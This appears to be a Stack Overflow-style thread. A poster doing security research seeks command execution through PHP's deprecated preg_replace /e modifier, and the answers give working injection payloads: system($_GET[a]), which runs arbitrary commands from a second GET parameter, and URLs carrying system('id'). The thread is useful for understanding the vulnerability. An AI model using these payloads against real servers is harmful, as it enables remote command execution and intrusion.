# php preg_replace escapes single and double quotes

Tags: php, string, security, escaping, preg-replace

I am doing some security research and I have a problem with the evalutation of `preg_replace()` in PHP. My goal is that I can execute commands with this function. I have control over the first and third parameter of the `preg_replace` function but not the second. This code works just as intended, I only have trouble using a function like `system()` which needs a string as a parameter which I am not able to provide.

```
echo preg_replace('/(.+)/e', '\\1', "phpinfo()");
echo preg_replace('/(.+)/e', '\\1', 'phpinfo()');//we both work as intended
```

I have tried this simple example to find out how to use quotes and make use of strings in this context.

```
echo preg_replace('/(.+)/e', '\\1', '$a="1"');
echo preg_replace('/(.+)/e', '\\1', "$a='1'"); //basically the same, only switched ' and "
```

It is supposed to execute the command `$a="1";` (I am well aware that it does nothing useful).

To be completely precise the third parameter is a **GET parameter** and I do not know if it is still relevant in this case what kind of quotation marks I use. To accomodate for both cases I tried both  but without any success.

When I execute this line,

```
php > echo preg_replace('/(.+)/e', '\\1', '$a="1"');
```

I get an **error** like,

```
PHP Parse error:  syntax error, unexpected '"', expecting identifier (T_STRING) in php shell
    code(1) : regexp code on line 1
PHP Fatal error:  preg_replace(): Failed evaluating code:
$a=\"1\" in php shell code on line 1


//Same command, switches quotation marks
php > echo preg_replace('/(.+)/e', '\\1', "$a='1'");

PHP Notice:  Undefined variable: a in php shell code on line 1
PHP Parse error:  syntax error, unexpected '=' in php shell code(1) : regexp code on line 1
PHP Fatal error:  preg_replace(): Failed evaluating code:
=\'1\' in php shell code on line 1
```

I have read the error messages and did some research on this topic but was unable to find something that helped me.

Using `preg_quote` around the third parameter does not solve this problem.

What I want is being able to execute functions that take strings as an input in the evaluation of `preg_replace()`. Any help is highly appreciated.

Comment: add preg_quote to escape the re string: http://php.net/manual/en/function.preg-quote.php

Comment: First, `e` modifier is deprecated. You need to use `preg_replace_callback`. Next, `"$a='1'"` is a double-quoted string literal, and it supports string interpolation. It is NOT the same as `'$a="1"'`. In `"$a='1'"`, the `$a` is a reference to a `$a` variable - and you have not defined it anywhere. Now, it is not at all clear what you are doing.

Comment: @Tamar That does not help, I have already tried it.

Comment: @WiktorStribiżew I am aware that it is deprecated but for the moment I have to work with this. It is not used in a productive environment. I will update my question to make it more clear what I want to do

Comment: But `e` has no effect on the *input* argument. It only allows "interpolating" backreferences in the replacement argument.

Comment: If I understood this correctly the first parameter searches for a given pattern in the input parameter and replaces the found pattern(s) in the second parameter. In my case I have a group so my third parameter should be inserted in the second parameter and then getting evaluated. Or am I mistaken here?

Comment: @WiktorStribiżew I have updated my question. I hope it is more clear now.

Answer (score 0, accepted):

I figuered out how to solve my problem. I came to the conclusion that what I wanted to do does not seem to be possible, at least not in this way.

However, when I use the following code

```
echo preg_replace("/(.+)/e", "\\1", "system($_GET[a])");
```

I can simply add another GET parameter in the URL which contains all my commands. With this method I do not need to care about `preg_replace` escaping my ' and ".

Note, that the Use of `$_GET[a]` is not correct, but because PHP is so nice it just assumes, that the unknow constant a is supposed to be a string and interpretes it this way. In the GET parameter `a` I can now insert any command I desire to execute.

Answer (score 1):

I would like to comment but can't yet...

I assume the code looks like this:

```
preg_replace('/(.+)/e', '\\1', $_GET['code']);
```

since you are saying that the third parameter comes with GET. Can't you just do something like

```
http://somesuperduperurl.xxx/code=system('id')
```

? You say that you are able to control the first parameter of preg_replace. Is it also through a GET?

```
http://somesuperduperurl.xxx/sth=/known/e?code=system('id')
```

Have you tried this?

Comment: I do not think this is going to work. I have already found another solution where I use an additional parameter and rely on PHPs way ofinterpreting unknown constants as strings. Since this does not directly answer this question, I did not post the solution here. If you are interested in it I can do it anyway. But thank you anyway :)

Comment: I suggest to post it. Might help others ;)